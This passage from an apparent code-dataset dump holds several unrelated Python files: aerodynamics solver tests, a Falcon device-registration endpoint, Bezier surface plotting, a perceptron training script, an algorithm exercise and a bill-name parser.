wavelength\n\n\t\t# discretisation\n\t\tWakeFact=10\n\t\tNcycles=10 # number of \"cycles\"\n\t\tMfact=2\n\t\tif c>L: M=np.ceil(4*Mfact*c/L)\n\t\telse: M=Mfact*4\n\n\t\t# Numerical 
solution\n\t\tS=uvlm.solver(T=Ncycles*L/uinf,M=M,Mw=M*WakeFact,b=b,\n\t\t\t Uinf=np.array([uinf,0.]),alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\tS=set_gust.sin(S,w0,L,ImpStart=False)\n\t\tS.eps_Hall=0.003\n\t\tS.solve_dyn_Gamma2d()\n\n\t\t# Analytical solution\n\t\tCLv = an.sears_lift_sin_gust(w0,L,uinf,c,S.time)\t\t\n\n\t\t# Post-process\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\tfig = plt.figure('Aerodynamic force coefficients',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.set_title(r'Lift')\n\t\t#ax.plot(S.time,THCF[:,0],'b',label=r'Drag')\n\t\tax.plot(S.time,THCF[:,1],'k',label=r'UVLM')\n\t\tax.plot(S.time,CLv,'r',label=r\"Sear's\")\n\t\tax.legend()\n\n\t\t# visualise wake TH\n\t\tfig=plt.figure('Wake TH', figsize=[10.,6.0])\n\t\tax=fig.add_subplot(121)\n\t\tax.set_title('Snapshots')\n\t\tfor ii in range(int(Ncycles/2)):\n\t\t\ttt= 2*ii*4*Mfact\n\t\t\tax.plot(S.THZetaW[tt,:,0],S.THZetaW[tt,:,1],\n\t\t\t\t label=r'%.2e' %S.time[tt])\n\t\tax.set_xlabel('x [m]')\n\t\tax.set_ylabel('y [m]')\n\t\tax.legend()\n\n\n\t\tax=fig.add_subplot(122)\n\t\tax.set_title('TH specific points')\n\t\tNpoints=5\n\t\tfor ii in range(0,S.Kw,int(S.Kw/(Npoints+1))):\n\t\t\tax.plot(S.time,S.THZetaW[:,ii,1],label=r'x=%.2e m' %S.ZetaW[ii,0] )\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_ylabel('y [m]')\n\t\tax.legend()\n\n\t\tplt.show()\n\n\n\n\tdef test_impulse(self,M=4,WakeFact=10):\n\t\t'''\n\t\tImpulsive start - Wagner solution\n\t\t'''\n\n\t\t### random geometry\n\t\tM=6\n\t\tWakeFact=20\n\t\tc=3.\n\t\tb=0.5*c\n\t\tuinf=20.0\n\t\taeff=1.0*np.pi/180.\n\t\tT=5.0\n\n\t\t###### Numerical solution - Hall's correction\n\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t alpha=aeff)\n\t\tS.build_flat_plate()\n\t\tS._imp_start=True\n\t\tS.eps_Hall=0.003\n\t\tS._update_AIC=True\n\t\tS.solve_dyn_Gamma2d()\n\n\t\t###### Numerical solution - no Hall's correction\n\t\tS2=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t alpha=aeff)\n\t\tS2.build_flat_plate()\n\t\tS2._imp_start=True\n\t\tS2.eps_Hall=1.0\n\t\tS2._update_AIC=True\n\t\tS2.solve_dyn_Gamma2d()\n\n\t\t##### Analytical solution\n\t\tCLv_an=an.wagner_imp_start(aeff,uinf,c,S.time)\n\n\t\t##### Post-process numerical solution - Hall's correction\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass=np.zeros((S.NT,2))\n\t\tfor tt in range(S.NT):\n\t\t THCFmass[tt,:]=S.THFmassC[tt,:,:].sum(0)/S.qinf/S.chord\n\t\tTHCFcirc=THCF-THCFmass\n\n\t\t##### Post-process numerical solution - no Hall's correction\n\t\tTHCF2=S2.THFaero/S2.qinf/S2.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass2=np.zeros((S2.NT,2))\n\t\tfor tt in range(S2.NT):\n\t\t THCFmass2[tt,:]=S2.THFmassC[tt,:,:].sum(0)/S2.qinf/S2.chord\n\t\tTHCFcirc2=THCF2-THCFmass2\n\n\n\n\t\tplt.close('all')\n\t\t# non-dimensional time\n\t\tsv=2.0*S.Uabs*S.time/S.chord\n\t\tfig = plt.figure('Lift coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\t# Wagner\n\t\tax.plot(0.5*sv, CLv_an,'0.6',lw=3,label='An Tot')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF[:,1],'k',lw=1,label='Num Tot - Hall')\n\t\tax.plot(0.5*sv, THCFmass[:,1],'b',lw=1,label='Num Mass - Hall')\n\t\tax.plot(0.5*sv, THCFcirc[:,1],'r',lw=1,label='Num Jouk - Hall')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF2[:,1],'k--',lw=2,label='Num Tot')\n\t\tax.plot(0.5*sv, THCFmass2[:,1],'b--',lw=2,label='Num Mass')\n\t\tax.plot(0.5*sv, THCFcirc2[:,1],'r--',lw=2,label='Num Jouk')\n\t\tax.set_xlabel(r'$s/2=U_\infty 
t/c$')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\n\t\tfig2 = plt.figure('Lift coefficient - zoom',(10,6))\n\t\tax=fig2.add_subplot(111)\n\t\t# Wagner\n\t\tax.plot(0.5*sv, CLv_an,'0.6',lw=3,label='An Tot')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF[:,1],'k',lw=1,label='Num Tot - Hall')\n\t\tax.plot(0.5*sv, THCFmass[:,1],'b',lw=1,label='Num Mass - Hall')\n\t\tax.plot(0.5*sv, THCFcirc[:,1],'r',lw=1,label='Num Jouk - Hall')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF2[:,1],'k--',lw=2,label='Num Tot')\n\t\tax.plot(0.5*sv, THCFmass2[:,1],'b--',lw=2,label='Num Mass')\n\t\tax.plot(0.5*sv, THCFcirc2[:,1],'r--',lw=2,label='Num Jouk')\n\t\tax.set_xlabel(r'$s/2=U_\infty t/c$')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\t\tax.set_xlim(0.,6.)\n\n\t\tfig = plt.figure('Drag coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(S.time, THCF[:,0],'k',label='Num Tot')\n\t\tax.plot(S.time, THCFmass[:,0],'b',label='Num Mass')\n\t\tax.plot(S.time, THCFcirc[:,0],'r',label='Num Jouk')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Drag')\n\t\tax.legend()\n\n\t\t# Time histories of circulation\n\t\tfig = plt.figure('Vortex rings circulation time history',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S.time,S.THGamma[:,mm],color=clist[kk],\n\t\t \t label='M=%.2d - Hall'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S.time,S.THGammaW[:,mm],color=clist[kk],\n\t\t \t label='Mw=%.2d - Hall'%(mm))\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S2.time,S2.THGamma[:,mm],color=clist[kk],linestyle='--',\n\t\t label='M=%.2d'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S2.time,S2.THGammaW[:,mm],color=clist[kk],linestyle='--',\n\t\t label='Mw=%.2d'%(mm))\n\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('Gamma')\n\t\tax.legend(ncol=2)\n\t\tplt.show()\n\n\n\n\n\n\n\nif __name__=='__main__':\n\n\n\tT=Test_dyn()\n\t\n\n\t### steady\n\tT.test_steady()\n\t\n\t### plunge motion\n\tT.test_plunge(case=1,M=6,WakeFact=10)\n\n\t### gust response\n\tT.test_sin_gust()\n\n\t# wagner\n\tT.test_impulse(M=2,WakeFact=10)\n\n\n\n\n\n\n\n","sub_path":"test_dyn.py","file_name":"test_dyn.py","file_ext":"py","file_size_in_byte":14692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"86765905","text":"# -*- coding: utf-8 -*-\nimport random\nimport time\nfrom datetime import datetime\nfrom watercourse.model import Pond\n\n\nseed = 'abcdefghijklmnopqrstuvwxyz0123456789'\nSEED = ''.join([seed for i in range(10)])\nTIMESTART_STR = '2016-01'\nMILLISECOND = 1\nTIMESTART = int(time.mktime(datetime.strptime(TIMESTART_STR,\n '%Y-%m').timetuple())) * MILLISECOND\nTIME_STEP = 3600 * MILLISECOND\n\nUSERS_BATCH = [\n 'useractivitystorytest/9krapvh7nqvcb82vte8jtw4n746ul5d4qbatch',\n 'useractivitystorytest/3z44orw8cvq97b02r1gg2but61itaqmx3batch',\n 'useractivitystorytest/31lsda9th6tkdilcyj81qoayhr8iygpx4batch',\n 'useractivitystorytest/9wb2e6mgf1xpy5nk49plasak2ybdo6rpebatch',\n 'useractivitystorytest/k75szk931ghz8jsd39vzqo3oy9q7zfewrbatch',\n 'useractivitystorytest/vlxphdf6i6wnqfsrvd1ko9ag4mdful7g3batch',\n 
'useractivitystorytest/cby5afjzyimhuo2w03ugz4i2d3u0e36mebatch',\n 'useractivitystorytest/1h8di9a0hmgkq527oveoxtyvf9yt0ow7tbatch',\n 'useractivitystorytest/iffexkp87bdoqhq6fzxj1lp4zr8ampa8cbatch',\n 'useractivitystorytest/8q2l7n7d9xe52i2kgeydbhscrvt0gjcgubatch',\n 'useractivitystorytest/9krapvh7nqvcb82vte8jtw4n746ul5d4qhctab',\n 'useractivitystorytest/3z44orw8cvq97b02r1gg2but61itaqmx3hctab']\n\nSTRINGKEY = 'ceshi0'\n\nENDMONTH = '2016-03'\nTIMEEND = int(time.mktime(datetime.strptime(ENDMONTH,\n '%Y-%m').timetuple())) * MILLISECOND\n\n\ndef random_str(strlen):\n _en_str = ''.join(random.sample(SEED, strlen))\n en_str = u'测试中文,,,,' + _en_str + u'中文字符'\n return {STRINGKEY: en_str}\n\n\ndef random_str_list(listlen):\n strlen = random.randint(8, 128)\n return [random_str(strlen) for i in range(listlen)]\n\n\ndef insert_records_batch():\n timeend = TIMEEND\n timestamp = TIMESTART\n cab = Pond(home='/home/liujinliu/tmp/cabineTest')\n while timestamp < timeend:\n random.shuffle(USERS_BATCH)\n user_ids = USERS_BATCH[0:10]\n timestamp += TIME_STEP\n batches = []\n for user_id in user_ids:\n listlen = random.randint(3, 50)\n record = random_str_list(listlen)\n batches.append(dict(uid=user_id, timestamp=timestamp,\n doc=record[::-1]))\n cab.batch_write(batches)\n\n\nif __name__ == '__main__':\n insert_records_batch()\n","sub_path":"src/test/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12413829","text":"import json\nimport uuid\nimport falcon\nfrom sciencecache_model import *\nfrom playhouse.shortcuts import dict_to_model, model_to_dict\nfrom utilities import *\nimport smtplib\nfrom email.mime.text import MIMEText\n\nclass deviceinfo_end_point():\n\n\n @falcon.before(check_logged_in)\n def on_get(self, request, response, deviceinfo_id = None):\n\n\n results =[]\n try:\n with sciencecache_database.transaction():\n\n if (deviceinfo_id is not None):\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n results = model_to_dict(deviceinfo,recurse=True)\n\n\n elif(request.get_param('form')):\n form_id = request.get_param('form')\n for r in Deviceinfo.select().where(Deviceinfo.obs_point_form == form_id):\n results.append(model_to_dict(r, recurse=True))\n\n\n else:\n for r in Deviceinfo.select():\n results.append(model_to_dict(r, recurse=False))\n\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n except Exception as e:\n print(e)\n raise falcon.HTTPBadRequest(description=\"Failed to get Deviceinfo\")\n\n response.body = json.dumps(results, default=json_serial)\n\n\n\n def on_post(self, request, response, deviceinfo_id = None):\n\n\n # Do not allow POST (create) when deviceinfo_id is given\n if deviceinfo_id is not None:\n raise falcon.HTTPMethodNotAllowed(\n allowed_methods=['GET', 'POST', 'PUT','OPTIONS'],\n description='Deviceinfo must be created without a deviceinfo_id'\n )\n\n try:\n # load the request body\n deviceinfo_dict = json.loads(request.stream.read() or 0)\n\n email_token = str(uuid.uuid4())\n\n #sanitize input\n bad_keys = ['id', 'is_validated']\n for key in bad_keys:\n if(key in deviceinfo_dict):\n del deviceinfo_dict[key]\n\n incomingUUID = deviceinfo_dict['uuid']\n incomingEmail = deviceinfo_dict['user_email']\n\n #if uuid already exists\n deviceUser_dict = None\n try:\n if incomingEmail:\n deviceUser = 
Deviceinfo.select().where((Deviceinfo.user_email == incomingEmail) & (Deviceinfo.uuid == incomingUUID) ).get()\n deviceUser_dict = model_to_dict(deviceUser, recurse=False)\n else:\n deviceUser = Deviceinfo.select().where(Deviceinfo.uuid == incomingUUID).get()\n deviceUser_dict = model_to_dict(deviceUser, recurse=False)\n except:\n pass\n\n if deviceUser_dict:\n print('found preexisting')\n\n # apply the changes -- put\n for field in deviceinfo_dict:\n deviceUser_dict[field] = deviceinfo_dict[field]\n\n deviceUser_dict['email_token'] = email_token\n\n # save changes\n updated_deviceinfo = dict_to_model(Deviceinfo, deviceUser_dict, ignore_unknown=True)\n updated_deviceinfo.save()\n\n #check if verified\n if deviceUser_dict['user_email'] and not deviceUser_dict['is_validated']:\n print('we have email and is not validated!')\n sendRegisterEmail(updated_deviceinfo)\n print('resending email')\n\n\n # response.body = json.dumps(model_to_dict(updated_deviceinfo), default=json_serial)\n info = {\n 'isSuccessful': True,\n 'isUpdate': True,\n 'isNew': False\n }\n response.body = json.dumps(info, ensure_ascii=False)\n\n else:\n print('no preexisting user')\n # check for preexisting device uuid\n\n #create new Deviceinfo -- post\n new_deviceinfo = None\n deviceinfo_dict['is_validated'] = False\n deviceinfo_dict['email_token'] = email_token\n new_deviceinfo = dict_to_model(Deviceinfo, deviceinfo_dict, ignore_unknown=True)\n\n # remove new verification_uuid before save\n new_deviceinfo.save()\n\n #also check for is_validated\n if(new_deviceinfo.user_email):\n # make temp uuid\n sendRegisterEmail(new_deviceinfo)\n\n response.status = falcon.HTTP_CREATED\n # response.body = json.dumps(model_to_dict(new_deviceinfo), default=json_serial)\n info = {\n 'isSuccessful': True,\n 'isUpdate': False,\n 'isNew': True\n }\n response.body = json.dumps(info, ensure_ascii=False)\n\n\n\n except Exception as e:\n raise falcon.HTTPBadRequest(description=str(e))\n\n\n\n @falcon.before(check_logged_in)\n def on_put(self, request, response, deviceinfo_id=None):\n # Do not allow PUT (update) without a deviceinfo_id\n if deviceinfo_id is None:\n raise falcon.HTTPBadRequest(description=\"deviceinfo_id can not be empty: deviceinfo/123\")\n\n try:\n\n # load the request body\n changes = json.loads(request.stream.read() or 0)\n\n #sanitize input\n bad_keys = ['id']\n for key in bad_keys:\n if(key in changes):\n del changes[key]\n\n\n #find Deviceinfo to update\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n deviceinfo_dict = model_to_dict(deviceinfo, recurse=False)\n\n # apply the changes\n for field in changes:\n deviceinfo_dict[field] = changes[field]\n\n # save changes\n updated_deviceinfo = dict_to_model(Deviceinfo, deviceinfo_dict, ignore_unknown=True)\n updated_deviceinfo.save()\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n\n except Exception as e:\n raise falcon.HTTPInternalServerError(description=str(e))\n\n response.body = json.dumps(model_to_dict(updated_deviceinfo),default=json_serial)\n\n\n\n @falcon.before(check_logged_in)\n def on_delete(self, request, response, deviceinfo_id=None):\n\n if deviceinfo_id is None:\n raise falcon.HTTPBadRequest(description=\"deviceinfo_id can not be empty: deviceinfo/123\")\n\n\n try:\n #find Deviceinfo\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n deviceinfo.delete_instance()\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n 
description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n\n except Exception as e:\n print (e)\n raise falcon.HTTPInternalServerError(description=str(e))\n\n response.status = falcon.HTTP_NO_CONTENT\n\n\ndef sendRegisterEmail(deviceinfo):\n \"\"\"Device info email sending method\"\"\"\n\n url = configuration['email']['siteurl'] + 'verifyuser?email=' + deviceinfo.user_email + '&uuid=' + deviceinfo.uuid + '&token=' + deviceinfo.email_token\n\n # try:\n message = \"You have started registration for the ScienceCache citizen science phone application. Please click the\\n\" \\\n \"registration link below to complete registration.
 <a href='\" + url + \"'>
Register Here</a>\"\n email = MIMEText(message, 'html')\n email['Subject'] = 'Sciencecache email registration'\n email['From'] = configuration['email']['from_email']\n email['Content'] = 'Content-type: text/html'\n\n email_recipients = []\n email_recipients.append(str(deviceinfo.user_email))\n email['To'] = \", \".join(email_recipients)\n\n send_registration = smtplib.SMTP(configuration['email']['smtp'])\n send_registration.sendmail(email['From'], email_recipients, email.as_string())\n send_registration.quit()\n # except Exception as e:\n # print(e)\n # raise falcon.HTTPInternalServerError(\n # title='Error sending registration email.',\n # description='Failed to send'\n # )","sub_path":"endpoints/deviceinfo.py","file_name":"deviceinfo.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447435561","text":"import unittest\n\nfrom src.Algebra.Structures.Function.Parser.FunctionParser import FunctionParser\nfrom src.Calculus.Integration.QuadratureAlgorithm import QuadratureAlgorithm\n\n\nclass QuadratureTest(unittest.TestCase):\n\n @staticmethod\n def test_simple_derivative():\n parser = FunctionParser()\n q = QuadratureAlgorithm(3)\n graph = parser.parse(\"x^2+5\")\n q.approximate_integral(graph, 1, 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/MathTests/CalculusTests/QuadratureTests/test_quadrature.py","file_name":"test_quadrature.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"577484475","text":"import sounddevice as sd\r\nfrom scipy.io.wavfile import write\r\nfrom scipy.io.wavfile import read\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport sys\r\n\r\nfs = 44100 # Sample rate\r\nseconds = 3 # Duration of recording\r\n\r\nif input(\"New recording? (y/n): \") == \"y\":\r\n\tprint(\"\\nRecording...\")\r\n\tmyrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)\r\n\tsd.wait() # Wait until recording is finished\r\n\tprint(\"Done\")\r\n\twrite('output_cur.wav', fs, myrecording) # Save as WAV file \r\n\r\nfs3, data3 = read('output_cur.wav')\r\n#data3 = np.ndarray.tolist(data3)\r\n\r\nif input(\"Plot raw? (y/n): \") == \"y\":\r\n\tplt.plot(data3)\r\n\tplt.show()\t\r\n\r\n# if input(\"Plot gt.5 (y/n): \") == \"y\":\r\n# \tplt.plot(data3)\r\n# \tplt.scatter(np.where(data3 > 0.5)[0], data3[data3 > 0.5])\r\n# \tplt.show()\r\n\r\nif input(\"Plot peaks? 
(y/n): \") == \"y\":\r\n\tdetect_threshold = 0.5\r\n\tdots = np.where(data3 > detect_threshold)[0]\r\n\r\n\tsearch_bin = 1000\r\n\tpeaks = []\r\n\tpeakp = []\r\n\r\n\tpeaks.append(dots[0])\r\n\r\n\tfor d in dots:\r\n\t if d > peaks[-1] and d < peaks[-1]+search_bin:\r\n\t if data3[d][0] > data3[peaks[-1]][0]:\r\n\t peaks[-1] = d\r\n\t else:\r\n\t if d > peaks[-1] + search_bin:\r\n\t peaks.append(d)\r\n\r\n\tfor i in peaks:\r\n\t peakp.append(data3[i][0])\r\n\r\n\tplt.plot(data3)\r\n\tplt.scatter(peaks, peakp)\r\n\tplt.show()\r\n","sub_path":"rec_sound.py","file_name":"rec_sound.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"506045699","text":"# coding=utf-8\n\"\"\"Bezier Surface using python, numpy and matplotlib\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\n\n__author__ = \"Daniel Calderon\"\n__license__ = \"MIT\"\n\n\ndef generateT(t):\n return np.array([[1, t, t**2, t**3]]).T\n\n\ndef evalBernstein3(k, t):\n # Full Bezier Matrix\n Mb = np.array([[1, -3, 3, -1], [0, 3, -6, 3], [0, 0, 3, -3], [0, 0, 0, 1]])\n \n T = generateT(t)\n \n return np.dot(Mb[k,:], T)[0]\n\n\ndef evalBezierSurfaceSample(ps, t, s):\n \n Q = np.zeros(3)\n for k in range(4):\n for l in range(4):\n Bk = evalBernstein3(k, s)\n Bl = evalBernstein3(l, t)\n \n Q += Bk * Bl * ps[k, l]\n \n return Q\n\ndef evalBezierSurface(ps, ts, ss):\n \n # size the output from the sample arrays rather than the global N\n Q = np.ndarray(shape=(len(ts), len(ss), 3), dtype=float)\n for i in range(len(ts)):\n for j in range(len(ss)):\n Q[i,j] = evalBezierSurfaceSample(ps, ts[i], ss[j])\n\n return Q\n\nif __name__ == \"__main__\":\n \n \"\"\"\n Defining control points\n \"\"\"\n \n # A 4x4 array with a control point in each of those positions\n P = np.ndarray(shape=(4, 4, 3), dtype=float)\n P[0, 0, :] = np.array([[0, 0, 0]])\n P[0, 1, :] = np.array([[0, 1, 0]])\n P[0, 2, :] = np.array([[0, 2, 0]])\n P[0, 3, :] = np.array([[0, 3, 0]])\n \n P[1, 0, :] = np.array([[1, 0, 0]])\n P[1, 1, :] = np.array([[1, 1, 10]])\n P[1, 2, :] = np.array([[1, 2, 10]])\n P[1, 3, :] = np.array([[1, 3, 0]])\n \n P[2, 0, :] = np.array([[2, 0, 0]])\n P[2, 1, :] = np.array([[2, 1, 10]])\n P[2, 2, :] = np.array([[2, 2, 10]])\n P[2, 3, :] = np.array([[2, 3, 0]])\n \n P[3, 0, :] = np.array([[3, 0, 0]])\n P[3, 1, :] = np.array([[3, 1, -5]])\n P[3, 2, :] = np.array([[3, 2, -5]])\n P[3, 3, :] = np.array([[3, 3, 0]])\n \n # Setting up the matplotlib display for 3D\n fig = mpl.figure()\n ax = fig.gca(projection='3d')\n \n \"\"\"\n Visualizing the control points\n \"\"\"\n # They are sorted into a list of points\n Pl = P.reshape(16, 3)\n \n # Each component is queried from the previous array\n ax.scatter(Pl[:,0], Pl[:,1], Pl[:,2], color=(1,0,0), label=\"Control Points\")\n \n \"\"\"\n Discretizing the surface\n \"\"\"\n # We use the same amount of samples for both, t and s parameters\n N = 10\n \n # The parameters t and s should move between 0 and 1\n ts = np.linspace(0.0, 1.0, N)\n ss = np.linspace(0.0, 1.0, N)\n \n # This function evaluates the bezier surface at each t and s samples in the arrays\n # The solution is stored in the 2D-array Q, where each sample is a 3D vector\n Q = evalBezierSurface(P, ts, ss)\n \n \"\"\"\n Visualizing the Bezier surface\n \"\"\"\n # For convenience, we re-organize the data into a list of points\n QlinearShape = (Q.shape[0] * Q.shape[1], 3)\n Ql = Q.reshape(QlinearShape)\n \n # An option is to plot just each dot computed\n #ax.scatter(Ql[:,0], Ql[:,1], Ql[:,2], 
color=(0,0,1))\n \n # The more elegant option is to make a triangulation and visualize it as a surface\n surf = ax.plot_trisurf(Ql[:,0], Ql[:,1], Ql[:,2], linewidth=0, antialiased=False)\n\n # Showing the result\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.legend()\n mpl.title(\"Bezier Surface\")\n mpl.show()","sub_path":"examples/ex_surface.py","file_name":"ex_surface.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314337979","text":"\"\"\"\n * Given an array nums containing n + 1 integers\n * where each integer is between 1 and n (inclusive),\n * prove that at least one duplicate number must exist.\n * Assume that there is only one duplicate number, find the duplicate one.\n\n Note:\n You must not modify the array (assume the array is read only).\n You must use only constant, O(1) extra space.\n Your runtime complexity should be less than O(n^2).\n There is only one duplicate number in the array, but it could be repeated more than once.\n\"\"\"\n\n\nclass Solution1(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n lo, hi = 1, len(nums) - 1\n while lo < hi:\n mid = lo + (hi - lo) // 2\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count <= mid:\n lo = mid + 1\n else:\n hi = mid\n return lo\n\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n slow = fast = 0\n while fast < n and nums[fast] < n:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast: break\n\n fast = 0\n while slow != fast:\n slow, fast = nums[slow], nums[fast]\n return slow\n","sub_path":"medium/FindtheDuplicateNumber.py","file_name":"FindtheDuplicateNumber.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644410289","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\n\nfrom pmc import PMC\nimport util\n\ndef equacao_reta(x, y):\n return (x>-5) * (x<5) * (y>-5) * (y<5)\n # return (x>0) * (y>0) * (y>-x+5)\n # return y > -x + 5\n\ndef ativacao_reta(x, y):\n # bipolar step\n return equacao_reta(x,y)*2-1\n\ndef gerar_datasets(sufixo):\n util.gerar_dataset_grid('reta_1/dataset_treino_%s.data'%str(sufixo), ativacao_reta, tamanho=400)\n # util.gerar_dataset('reta_1/dataset_treino_%s.data'%str(sufixo), ativacao_reta, tamanho=10)\n util.gerar_dataset('reta_1/dataset_teste_%s.data'%str(sufixo), ativacao_reta, tamanho=1500)\n\ndef treinar_rede(dataset, rn=None):\n x,d = dataset\n\n if(rn == None):\n rn = PMC(topologia=[2,8,4,2])\n\n rn.treinar(x, d, verbose=1, guardar_historico=1)\n\n rn.plotar_curva_aprendizado('Treino (%d épocas de treinamento)'%rn.epoca)\n\n rn.plotar_aprendizado(titulo='Treino (%d épocas de treinamento)'%rn.epoca)\n \n # rn.plotar_animacao(x,d,titulo='Treino (%d épocas de treinamento)'%rn.epoca)\n \n # rn.salvar_animacao(x,d,titulo='Treino (%d épocas de treinamento)'%rn.epoca,nome_arquivo='reta_1/animacao.mp4')\n\n return rn\n\ndef testar_rede(rn, dataset):\n x,d = dataset\n \n y = rn.classificar(x)\n\n erro = (y != d).sum()\n erro_perc = 100*erro/float(d.size)\n\n rn.plotar_aprendizado(x,d,titulo='Teste (%.4f%% de erro)'%erro_perc)\n\ndef main():\n sufixo = '1'\n\n gerar_datasets(sufixo)\n\n dataset_treino = 
util.carregar_dataset('reta_1/dataset_treino_%s.data'%str(sufixo))\n dataset_teste = util.carregar_dataset('reta_1/dataset_teste_%s.data'%str(sufixo))\n\n rn=None\n # rn = PMC.carregar('reta_1/rn_reta_%s.rn'%str(sufixo))\n\n # rn.plot_rn.plotar_dataset( dataset_treino[0] , dataset_treino[1] )\n \n rn = treinar_rede(dataset_treino, rn=rn)\n rn.salvar('reta_1/rn_reta_%s.rn'%str(sufixo))\n\n # testar_rede(rn, dataset_teste)\n\nif __name__ == \"__main__\":\n main()","sub_path":"capitulo_5_rede_pmc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522654933","text":"# SPDX-FileCopyrightText: 2020 Diego Elio Pettenò\n#\n# SPDX-License-Identifier: MIT\n\nimport datetime\nimport re\nfrom typing import Optional, Sequence\n\nfrom components import NameComponents\nfrom utils import build_dict_from_fake_table, find_box_starting_with\n\n\ndef _try_old_hyperoptic(text_boxes, logger) -> Optional[NameComponents]:\n if (\n text_boxes[0] == \"www.hyperoptic.com\\n\"\n or text_boxes[0] == \"www.hyperoptic.com \\n\"\n ):\n account_holder_box = text_boxes[1]\n elif len(text_boxes) > 8 and text_boxes[7] == \"www.hyperoptic.com \\n\":\n account_holder_box = text_boxes[0]\n else:\n return None\n\n logger.debug(f\"looking for customer name in {account_holder_box!r}\")\n account_holder_match = re.search(r\"Customer Name: ([^\\n]+)\\n\", account_holder_box)\n assert account_holder_match\n account_holder_name = account_holder_match.group(1)\n\n # Extract the bill date from a \"fake table\".\n #\n # Older (2017~2018) Hyperoptic bills have two multi-line text boxes, one including all\n # the labels, and the other including all of the values.\n #\n # They thankfully sit next to each other, so once one is found, it's possible to find\n # the invoice date with relative ease.\n titles_str = find_box_starting_with(text_boxes, \"DD Ref:\\n\")\n\n titles_idx = text_boxes.index(titles_str[0])\n values_str = text_boxes[titles_idx + 1]\n\n document_info = build_dict_from_fake_table(titles_str, values_str)\n bill_date_str = document_info[\"Invoice date:\"]\n bill_date = datetime.datetime.strptime(bill_date_str, \"%d %b %Y\")\n\n return NameComponents(bill_date, \"Hyperoptic\", account_holder_name, \"Bill\",)\n\n\ndef try_hyperoptic(text_boxes, parent_logger) -> 